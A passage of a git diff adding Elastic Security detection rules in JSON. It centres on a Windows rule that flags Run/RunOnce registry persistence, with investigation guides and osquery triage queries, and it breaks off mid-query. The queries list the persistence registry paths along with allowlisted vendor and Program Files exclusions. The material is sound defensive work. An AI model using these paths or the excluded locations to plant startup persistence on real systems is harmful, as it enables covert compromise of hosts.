Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_110.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_110.json new file mode 100644 index 00000000000..37ae21b821d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_110.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup or Run Key Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n (\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\",\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\system_tray\\\\lghub_system_tray.exe\\\" --minimized\"\n )\n ) or\n (\n process.name : \"LogiBolt.exe\" and registry.data.strings : (\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\"\n )\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --win-session-start\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\",\n \"?:\\\\ProgramData\\\\*\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background*\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background*\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"OneDrive.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"\n ) or\n \n process.name : \"Microsoft.SharePoint.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"MicrosoftEdgeUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\Expedient\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\*\\\\MicrosoftEdgeUpdateCore.exe\\\"\"\n ) or\n \n process.executable : \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\\\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\ProgramData\\\\*\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\Program Files\\\\Slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* Cisco */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n (\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n ) or\n (\n process.name : \"CiscoJabber.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Cisco Systems\\\\Cisco Jabber\\\\CiscoJabber.exe\\\" /min\"\n )\n )\n ) or\n\n /* Loom */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Loom, Inc.\" and\n process.name : \"Loom.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Loom\\\\Loom.exe --process-start-args \\\"--loomHidden\\\"\"\n )\n ) or\n\n /* Adobe */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n process.name : (\"Acrobat.exe\", \"FlashUtil32_*_Plugin.exe\") and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\Macromed\\\\Flash\\\\FlashUtil32_*_Plugin.exe -update plugin\"\n )\n ) or\n\n /* CCleaner */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"PIRIFORM SOFTWARE LIMITED\" and\n process.name : (\"CCleanerBrowser.exe\", \"CCleaner64.exe\") and registry.data.strings : (\n \"\\\"C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\\\"Default\\\"\",\n \"\\\"C:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\\\" /MONITOR\"\n )\n ) or\n\n /* Opera */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Opera Norway AS\" and\n process.name : \"opera.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera\\\\launcher.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera GX\\\\launcher.exe\"\n )\n ) or\n\n /* Avast */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Avast Software s.r.o.\" and\n process.name : \"AvastBrowser.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\\\"?:\\\\Program Files (x86)\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\"\n )\n ) or\n\n /* Grammarly */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Grammarly, Inc.\" and\n process.name : \"GrammarlyInstaller.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Grammarly\\\\DesktopIntegrations\\\\Grammarly.Desktop.exe\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "97fc44d3-8dae-4019-ae83-298c3015600f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_111.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_111.json new file mode 100644 index 00000000000..fc6d15743e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_111.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup or Run Key Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n (\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\",\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\system_tray\\\\lghub_system_tray.exe\\\" --minimized\"\n )\n ) or\n (\n process.name : \"LogiBolt.exe\" and registry.data.strings : (\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\"\n )\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --win-session-start\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\",\n \"?:\\\\ProgramData\\\\*\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background*\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background*\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"OneDrive.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n 